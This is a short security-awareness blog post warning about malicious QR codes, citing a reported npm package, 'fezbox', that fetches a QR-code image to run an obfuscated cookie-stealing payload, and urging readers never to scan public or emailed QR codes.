I love it when people come up to me and say they are “wicked paranoid” about QR codes. I have been trying to educate people on the risks of QR codes for years and that gives me satisfaction that I have prevented that person from becoming a victim of a malicious QR code. QR codes have become ubiquitous since the pandemic, starting with menuless menus. I ask for a paper menu, and surprisingly, most restaurants still have them.
Here’s another example to bolster my case. Bleeping Computer reported that the Socket Threat Research Team has identified “a malicious package, ‘fezbox’, published to npmjs.com, the world’s largest open-source registry for JavaScript and Node.js developers….which contains hidden instructions to fetch a JPG image containing a QR code, which it can then further process to run a second-stage obfuscated payload as a part of the attack.” What does this mean? If scanned, the payload will read a cookie with document.cookie. If there is a username and password in the stolen cookie, it can steal that information directly from the victim’s server. The threat actor then has the victim’s credentials to access the victim’s data, including sensitive and proprietary data.
According to Bleeping Computer, “we have seen countless cases of QR codes deployed in social engineering scams…but these require human intervention…scanning the code and being led to a phishing website, for example…but this week’s discovery by Socket shows yet another twist on QR codes: a compromised machine can use them to talk to its command-and-control (C2) server in a way that, to a proxy or network security tool, may look like nothing more than ordinary image traffic.” Because the threats of malicious QR codes are not well-known yet, I anticipate that threat actors will continue to figure out ways to embed malicious code into them for various goals, including phishing, smishing, and credential stealing, and it will be hard to get out in front of the risk. One way to mitigate is to never scan a public QR code, never click on a QR code in an email, and be wicked paranoid about any QR code presented to you.